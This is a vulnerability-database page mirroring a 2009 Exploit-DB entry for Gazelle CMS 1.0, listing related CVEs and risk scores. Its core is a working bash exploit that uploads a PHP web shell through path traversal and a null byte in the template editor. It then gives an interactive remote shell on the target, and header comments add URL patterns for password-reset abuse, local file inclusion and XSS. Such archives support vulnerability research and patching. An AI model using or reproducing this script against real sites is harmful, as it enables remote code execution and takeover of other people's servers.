Lucene search
+L

Gazelle CMS 1.0 - Multiple Vulnerabilities / Remote Code Execution

🗓️ 12 Aug 2009 00:00:00Reported by IHTeamType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 34 Views

Gazelle CMS 1.0 Multiple Vulnerabilities / Remote Code Executio

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2009-3167
28 Jan 200900:00
circl
Circl
CVE-2009-3171
12 Aug 200900:00
circl
Circl
CVE-2009-3180
12 Aug 200900:00
circl
Circl
CVE-2009-3181
12 Aug 200900:00
circl
Circl
CVE-2009-3182
12 Aug 200900:00
circl
CVE
CVE-2009-3167
11 Sep 200918:00
cve
CVE
CVE-2009-3171
11 Sep 200920:00
cve
CVE
CVE-2009-3180
11 Sep 200920:00
cve
CVE
CVE-2009-3181
11 Sep 200920:00
cve
CVE
CVE-2009-3182
11 Sep 200920:00
cve
Rows per page
#!/bin/bash
#       Gazelle CMS 1.0 Multiple Vulnerabilities
#       Script Download: http://www.anantasoft.com/index.php?Gazelle%20CMS/Download
#       Found by white_sheep on 11/08/2009
#       Contact: [email protected] - https://www.ihteam.net
#       Need magic_quote_gpc Off for RCE and LFI
#       Thanks to r00t
#
#               PASSWORD RESET:
# http://localhost/gazelle/renew.php?user=[username]
#
#               LFI:
# author: fuzion (milw0rm.com/author/1343)
# http://localhost/gazelle/index.php?template=[LFI]
#
#               XSS:
# http://localhost/gazelle/user.php?user=</title>[XSS]
# http://localhost/gazelle/search.php?lookup=<script+type="text/javascript">[CODE]</script>
#
#               RCE:
echo
echo "###############################################"
echo "#             GazelleCMS 1.0 RCE              #"
echo "#  by white_sheep				    #"
echo "#  sheewhite[at]googlemail[dot]com            #"
echo "#						    #"
echo "#           https://www.ihteam.net            #"
echo "###############################################"
echo


EVILC='<?php passthru($_GET[cmd]); ?>'

echo -n "Insert url with path (ex.: http://localhost/gazelle): "
read SITE

PAGENAME=/modules/menu$RANDOM'.bak.php'

curl -F "siteTitle='INIT'$EVILC'EOF';type=text/html" $SITE'/admin/settemplate.php?customizetemplate=..'$PAGENAME'%00' 1>/dev/null 2>/dev/null

if [ "`curl -s $SITE''$PAGENAME | grep siteTitle`" == "" ]
then
	echo "[-] Not Vulnerable :( byee"
	exit
fi

while true
do
	echo -n "sh$: "
	read -r CMD
	CMD=`echo $CMD | sed 's/ /+/g'`
	echo $CMD
	curl -s "$SITE$PAGENAME?cmd=$CMD" | sed "s/.*'INIT'//g;s/'EOF'.*//g"
	echo
done

# milw0rm.com [2009-08-12]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Aug 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.03286
34